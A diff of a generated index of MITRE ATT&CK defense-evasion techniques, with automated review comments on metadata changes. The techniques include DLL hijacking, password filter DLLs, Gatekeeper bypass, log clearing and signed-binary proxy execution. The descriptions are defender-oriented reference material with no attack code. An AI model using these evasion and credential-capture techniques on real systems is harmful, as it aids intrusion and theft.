description: "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved
- April 9, 2018."
- url: https://twitter.com/r0wdy_/status/936365549553991680
+ September 12, 2024."
+ url: https://x.com/r0wdy_/status/936365549553991680
- source_name: insecure_reg_perms
description: Clément Labro. (2020, November 12). Windows RpcEptMapper Service
Insecure Registry Permissions EoP. Retrieved August 25, 2021.
@@ -1578,7 +1653,8 @@ defense-evasion:
url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1574.011
atomic_tests: []
T1542.003:
@@ -1635,7 +1711,6 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
atomic_tests: []
T1218.013:
technique:
@@ -1688,7 +1763,7 @@ defense-evasion:
PID /HMODULE=BASE_ADDRESS PATH_DLL ORDINAL_NUMBER). This command would
inject an import table entry consisting of the specified DLL into the module
at the given base address.(Citation: Mavinject Functionality Deconstructed)"
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T17:35:08.315Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Mavinject
x_mitre_detection: |-
@@ -1704,11 +1779,10 @@ defense-evasion:
- 'Process: Process Creation'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1036.005:
technique:
- modified: '2023-09-14T21:12:48.409Z'
+ modified: '2024-09-12T19:30:45.064Z'
name: 'Masquerading: Match Legitimate Name or Location'
description: |-
Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous.
@@ -1754,8 +1828,8 @@ defense-evasion:
external_id: T1036.005
- source_name: Twitter ItsReallyNick Masquerading Update
description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading.
- Retrieved April 22, 2019.
- url: https://twitter.com/ItsReallyNick/status/1055321652777619457
+ Retrieved September 12, 2024.
+ url: https://x.com/ItsReallyNick/status/1055321652777619457
- source_name: Docker Images
description: Docker. (n.d.). Docker Images. Retrieved April 6, 2021.
url: https://docs.docker.com/engine/reference/commandline/images/
@@ -1765,9 +1839,8 @@ defense-evasion:
url: https://www.elastic.co/blog/how-hunt-masquerade-ball
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1036.005
atomic_tests: []
T1600:
@@ -1794,7 +1867,7 @@ defense-evasion:
url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
description: Omar Santos. (2020, October 19). Attackers Continue to Target
Legacy Devices. Retrieved October 20, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-21T22:37:49.258Z'
name: Weaken Encryption
description: |-
Adversaries may compromise a network device’s encryption capability in order to bypass encryption that would otherwise protect data communications. (Citation: Cisco Synful Knock Evolution)
@@ -1818,8 +1891,6 @@ defense-evasion:
x_mitre_permissions_required:
- Administrator
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1036.008:
technique:
@@ -1883,11 +1954,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1564:
technique:
- modified: '2024-03-29T17:45:48.126Z'
+ modified: '2024-10-15T15:58:49.815Z'
name: Hide Artifacts
description: |-
Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection.(Citation: Sofacy Komplex Trojan)(Citation: Cybereason OSX Pirrit)(Citation: MalwareBytes ADS July 2015)
@@ -1908,8 +1978,8 @@ defense-evasion:
- Linux
- macOS
- Windows
- - Office 365
- x_mitre_version: '1.2'
+ - Office Suite
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'File: File Metadata'
- 'Application Log: Application Log Content'
@@ -1953,12 +2023,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1564
atomic_tests: []
T1484.002:
technique:
- modified: '2024-04-19T04:27:51.388Z'
+ modified: '2024-09-25T13:50:11.593Z'
name: Domain Trust Modification
description: "Adversaries may add new domain trusts, modify the properties of
existing domain trusts, or otherwise change the configuration of trust relationships
@@ -1978,9 +2047,14 @@ defense-evasion:
trust modifications such as altering the claim issuance rules to log in any
valid set of credentials as a specified user.(Citation: AADInternals zure
AD Federated Domain) \n\nAn adversary may also add a new federated identity
- provider to an identity tenant such as Okta, which may enable the adversary
- to authenticate as any user of the tenant.(Citation: Okta Cross-Tenant Impersonation
- 2023)"
+ provider to an identity tenant such as Okta or AWS IAM Identity Center, which
+ may enable the adversary to authenticate as any user of the tenant.(Citation:
+ Okta Cross-Tenant Impersonation 2023) This may enable the threat actor to
+ gain broad access into a variety of cloud-based services that leverage the
+ identity tenant. For example, in AWS environments, an adversary that creates
+ a new identity provider for an AWS Organization will be able to federate into
+ all of the AWS Organization member accounts without creating identities for
+ each of the member accounts.(Citation: AWS RE:Inforce Threat Detection 2024)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
@@ -2000,9 +2074,8 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- - Azure AD
- - SaaS
- x_mitre_version: '2.0'
+ - Identity Provider
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Application Log: Application Log Content'
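Review bot: `Azure AD` and `SaaS` collapse into the single platform `Identity Provider` for T1484.002, so any filter that matched either of the two old literals, or any count of platforms per technique, changes result here; check that a per-platform index which previously collected this technique under `Azure AD` or `SaaS` still picks it up under `Identity Provider`. The `'2.0'` to `'2.1'` bump matches the description expansion (Okta or AWS IAM Identity Center) in the hunk above, so the object is internally consistent.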
@@ -2019,6 +2092,10 @@ defense-evasion:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1484/002
external_id: T1484.002
+ - source_name: AWS RE:Inforce Threat Detection 2024
+ description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+ techniques for proactive threat detection. Retrieved September 25, 2024.
+ url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
- source_name: CISA SolarWinds Cloud Detection
description: CISA. (2021, January 8). Detecting Post-Compromise Threat Activity
in Microsoft Cloud Environments. Retrieved January 8, 2021.
@@ -2052,7 +2129,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1484.002
atomic_tests: []
T1562.009:
@@ -2102,7 +2178,7 @@ defense-evasion:
url: https://docs.microsoft.com/windows-server/administration/windows-commands/bootcfg
description: Gerend, J. et al. (2017, October 16). bootcfg. Retrieved August
30, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-31T14:51:47.352Z'
name: 'Impair Defenses: Safe Boot Mode'
description: |-
Adversaries may abuse Windows safe mode to disable endpoint defenses. Safe mode starts up the Windows operating system with a limited set of drivers and services. Third-party security software such as endpoint detection and response (EDR) tools may not start after booting Windows in safe mode. There are two versions of safe mode: Safe Mode and Safe Mode with Networking. It is possible to start additional services after a safe mode boot.(Citation: Microsoft Safe Mode)(Citation: Sophos Snatch Ransomware 2019)
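Review bot: the `modified` timestamp for T1562.009 moves backwards, from `2022-04-25T14:00:00.188Z` to `2021-08-31T14:51:47.352Z`, and the same happens for T1542.005, T1070.002, T1218.004, T1553.001, T1222.001, T1218.007, T1600.001 and T1055.003 elsewhere in this diff. The removed values all share the synthetic-looking `14:00:00.188Z` / `14:49:39.188Z` shape and `spec_version: '2.1'` is removed throughout, which suggests the index was regenerated from a different ATT&CK bundle than before (STIX 2.0 rather than 2.1). That is fine, but state the source bundle and ATT&CK release in the commit message so that a reader comparing `modified` dates does not conclude the index went stale.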
@@ -2130,8 +2206,6 @@ defense-evasion:
- Anti-virus
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1562.009
atomic_tests: []
T1542.005:
@@ -2174,7 +2248,7 @@ defense-evasion:
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#26
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Boot
Information. Retrieved October 21, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T16:35:53.806Z'
name: TFTP Boot
description: |-
Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images.
@@ -2198,12 +2272,10 @@ defense-evasion:
- 'Firmware: Firmware Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1497.001:
technique:
- modified: '2024-04-19T12:49:40.919Z'
+ modified: '2024-09-12T15:50:18.047Z'
name: 'Virtualization/Sandbox Evasion: System Checks'
description: "Adversaries may employ various system checks to detect and avoid
virtualization and analysis environments. This may include changing behaviors
@@ -2293,13 +2365,12 @@ defense-evasion:
url: https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/stopping-malware-fake-virtual-machine/
- source_name: Deloitte Environment Awareness
description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1497.001
atomic_tests: []
T1070.002:
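Review bot: the Deloitte reference URL changes from `.../1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc` to the same file ID with `/edit` appended, and the retrieved date jumps to September 13, 2024. Both values come from the upstream technique object and should not be hand-corrected in this generated file, but it is worth confirming once that the `/edit` form of the Google Drive link still opens for an anonymous reader before it lands in a published index; if it does not, the fix belongs upstream in the ATT&CK data.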
@@ -2323,7 +2394,7 @@ defense-evasion:
url: https://www.eurovps.com/blog/important-linux-log-files-you-must-be-monitoring/
description: Marcel. (2018, April 19). 12 Critical Linux Log Files You Must
be Monitoring. Retrieved March 29, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-29T21:23:51.886Z'
name: 'Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs'
description: |
Adversaries may clear system logs to hide evidence of an intrusion. macOS and Linux both keep track of system or user-initiated actions via system logs. The majority of native system logging is stored under the /var/log/
directory. Subfolders in this directory categorize logs by their related functions, such as:(Citation: Linux Logs)
@@ -2348,8 +2419,6 @@ defense-evasion:
- 'File: File Deletion'
- 'File: File Modification'
- 'Command: Command Execution'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1070.002
atomic_tests: []
T1218.004:
@@ -2378,7 +2447,7 @@ defense-evasion:
- source_name: LOLBAS Installutil
url: https://lolbas-project.github.io/lolbas/Binaries/Installutil/
description: LOLBAS. (n.d.). Installutil.exe. Retrieved July 31, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T18:47:52.603Z'
name: 'Signed Binary Proxy Execution: InstallUtil'
description: |-
Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) The InstallUtil binary may also be digitally signed by Microsoft and located in the .NET directories on a Windows system: C:\Windows\Microsoft.NET\Framework\v\InstallUtil.exe
and C:\Windows\Microsoft.NET\Framework64\v\InstallUtil.exe
.
@@ -2404,8 +2473,6 @@ defense-evasion:
- Application control
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1218.004
atomic_tests: []
T1027.008:
@@ -2457,18 +2524,17 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1574.001:
technique:
- modified: '2024-04-18T22:54:54.668Z'
+ modified: '2024-09-30T17:32:59.948Z'
name: 'Hijack Execution Flow: DLL Search Order Hijacking'
description: |-
Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
- Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
+ Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Hexacorn DLL Hijacking)(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
@@ -2484,8 +2550,8 @@ defense-evasion:
- Travis Smith, Tripwire
- Stefan Kanthak
- Marina Liang
- - Will Alexander
- - Ami Holeston
+ - Ami Holeston, CrowdStrike
+ - Will Alexander, CrowdStrike
x_mitre_deprecated: false
x_mitre_detection: Monitor file systems for moving, renaming, replacing, or
modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared
@@ -2499,7 +2565,7 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'File: File Modification'
- 'Module: Module Load'
@@ -2525,6 +2591,10 @@ defense-evasion:
description: Harbour, N. (2011, June 3). What the fxsst?. Retrieved November
17, 2020.
url: https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html
+ - source_name: Hexacorn DLL Hijacking
+ description: Hexacorn. (2013, December 8). Beyond good ol’ Run key, Part 5.
+ Retrieved August 14, 2024.
+ url: https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/
- source_name: Microsoft Security Advisory 2269637
description: Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved
March 13, 2020.
@@ -2552,12 +2622,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1574.001
atomic_tests: []
T1553.001:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-21T19:30:58.414Z'
name: 'Subvert Trust Controls: Gatekeeper Bypass'
description: |-
Adversaries may modify file attributes and subvert Gatekeeper functionality to evade user prompts and execute untrusted programs. Gatekeeper is a set of technologies that act as layer of Apple’s security model to ensure only trusted applications are executed on a host. Gatekeeper was built on top of File Quarantine in Snow Leopard (10.6, 2009) and has grown to include Code Signing, security policy compliance, Notarization, and more. Gatekeeper also treats applications running for the first time differently than reopened applications.(Citation: TheEclecticLightCompany Quarantine and the flag)(Citation: TheEclecticLightCompany apple notarization )
@@ -2653,7 +2722,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1553.001
atomic_tests: []
T1553.002:
@@ -2720,7 +2788,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1036.009:
technique:
@@ -2785,11 +2852,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1222.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:27:04.900Z'
name: 'File and Directory Permissions Modification: Windows File and Directory
Permissions Modification'
description: |-
@@ -2850,12 +2916,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1222.001
atomic_tests: []
T1574.014:
technique:
- modified: '2024-04-18T15:03:32.158Z'
+ modified: '2024-04-28T15:44:25.342Z'
name: AppDomainManager
description: "Adversaries may execute their own malicious payloads by hijacking
how the .NET `AppDomainManager` loads assemblies. The .NET framework uses
@@ -2881,7 +2946,7 @@ defense-evasion:
phase_name: defense-evasion
x_mitre_contributors:
- Thomas B
- - Ivy Bostock
+ - Ivy Drexel
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -2923,7 +2988,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1218.007:
technique:
@@ -2965,7 +3029,7 @@ defense-evasion:
Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).(Citation: Microsoft msiexec) The Msiexec.exe binary may also be digitally signed by Microsoft.
Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it may be signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse. Msiexec.exe execution may also be elevated to SYSTEM privileges if the AlwaysInstallElevated
policy is enabled.(Citation: Microsoft AlwaysInstallElevated 2018)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T17:33:16.346Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Signed Binary Proxy Execution: Msiexec'
x_mitre_detection: Use process monitoring to monitor the execution and arguments
@@ -2988,36 +3052,11 @@ defense-evasion:
- Application control
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1218.007
atomic_tests: []
T1556.002:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Vincent Le Toux
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
- type: attack-pattern
- created: '2020-02-11T19:05:45.829Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.002
- url: https://attack.mitre.org/techniques/T1556/002
- - url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
- description: Fuller, R. (2013, September 11). Stealing passwords every time
- they change. Retrieved November 21, 2017.
- source_name: Carnal Ownage Password Filters Sept 2013
- - url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
- description: Bialek, J. (2013, September 15). Intercepting Password Changes
- With Function Hooking. Retrieved November 21, 2017.
- source_name: Clymb3r Function Hook Passwords Sept 2013
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-21T16:16:18.271Z'
name: 'Modify Authentication Process: Password Filter DLL'
description: "Adversaries may register malicious password filter dynamic link
libraries (DLLs) into the authentication process to acquire user credentials
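Review bot: most of this hunk is key reordering, not a content change: `x_mitre_platforms`, `x_mitre_domains`, `x_mitre_contributors`, `object_marking_refs`, `id`, `type`, `created`, `created_by_ref` and `external_references` are deleted here and reinserted further down in the next hunk of the same T1556.002 object, with the two external references swapped in order. Emitting keys in a stable order from the generator (sorted, or consistently in source order) would shrink future regenerations to the real changes, which for this object are the `modified` timestamp and the fields touched in the following hunk.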
@@ -3041,22 +3080,44 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Vincent Le Toux
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages
) and correlate then investigate the DLL files these files reference.
Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Modification'
- 'File: File Creation'
- 'Module: Module Load'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
+ created: '2020-02-11T19:05:45.829Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/002
+ external_id: T1556.002
+ - source_name: Clymb3r Function Hook Passwords Sept 2013
+ description: Bialek, J. (2013, September 15). Intercepting Password Changes
+ With Function Hooking. Retrieved November 21, 2017.
+ url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
+ - source_name: Carnal Ownage Password Filters Sept 2013
+ description: Fuller, R. (2013, September 11). Stealing passwords every time
+ they change. Retrieved November 21, 2017.
+ url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1556.002
atomic_tests: []
T1070.007:
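Review bot: `x_mitre_permissions_required` (Administrator, SYSTEM) is removed from T1556.002 with nothing replacing it, while `revoked: false` and `x_mitre_deprecated: false` are added and the version goes `'2.0'` to `'2.1'`. Dropping the field is consistent with newer ATT&CK technique objects, but other entries in this same diff still carry `x_mitre_permissions_required` in their unchanged context (T1562.009, T1542.005, T1218.004, T1600.001, T1055.003), so anything that reads the field from this index must treat it as optional; worth a check over the index consumers before merging.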
@@ -3131,7 +3192,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1600.001:
technique:
@@ -3157,7 +3217,7 @@ defense-evasion:
url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
description: Omar Santos. (2020, October 19). Attackers Continue to Target
Legacy Devices. Retrieved October 20, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-21T22:36:22.369Z'
name: Reduce Key Space
description: |-
Adversaries may reduce the level of effort required to decrypt data transmitted over the network by reducing the cipher strength of encrypted communications.(Citation: Cisco Synful Knock Evolution)
@@ -3180,8 +3240,6 @@ defense-evasion:
- 'File: File Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1070.003:
technique:
@@ -3277,65 +3335,75 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1070.003
atomic_tests: []
T1202:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-10-03T14:47:17.154Z'
+ name: Indirect Command Execution
+ description: |-
+ Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), Scriptrunner.exe, as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts.(Citation: VectorSec ForFiles Aug 2017)(Citation: Evi1cg Forfiles Nov 2017)(Citation: Secure Team - Scriptrunner.exe)(Citation: SS64)(Citation: Bleeping Computer - Scriptrunner.exe)
+
+ Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
x_mitre_contributors:
- Matthew Demaske, Adaptforward
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ - Liran Ravich, CardinalOps
+ x_mitre_deprecated: false
+ x_mitre_detection: 'Monitor and analyze logs from host-based detection mechanisms,
+ such as Sysmon, for events such as process creations that include or are resulting
+ from parameters associated with invoking programs/commands/files and/or spawning
+ child processes/network connections. (Citation: RSA Forfiles Aug 2017)'
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.2'
+ x_mitre_data_sources:
+ - 'Command: Command Execution'
+ - 'Process: Process Creation'
+ x_mitre_defense_bypassed:
+ - Static File Analysis
+ - Application Control
type: attack-pattern
id: attack-pattern--3b0e52ce-517a-4614-a523-1bd5deef6c5e
created: '2018-04-18T17:59:24.739Z'
- x_mitre_version: '1.1'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1202
url: https://attack.mitre.org/techniques/T1202
+ external_id: T1202
+ - source_name: Bleeping Computer - Scriptrunner.exe
+ description: Bill Toulas. (2023, January 4). Hackers abuse Windows error reporting
+ tool to deploy malware. Retrieved July 8, 2024.
+ url: https://www.bleepingcomputer.com/news/security/hackers-abuse-windows-error-reporting-tool-to-deploy-malware/
- source_name: Evi1cg Forfiles Nov 2017
- url: https://twitter.com/Evi1cg/status/935027922397573120
description: Evi1cg. (2017, November 26). block cmd.exe ? try this :. Retrieved
- January 22, 2018.
+ September 12, 2024.
+ url: https://x.com/Evi1cg/status/935027922397573120
- source_name: RSA Forfiles Aug 2017
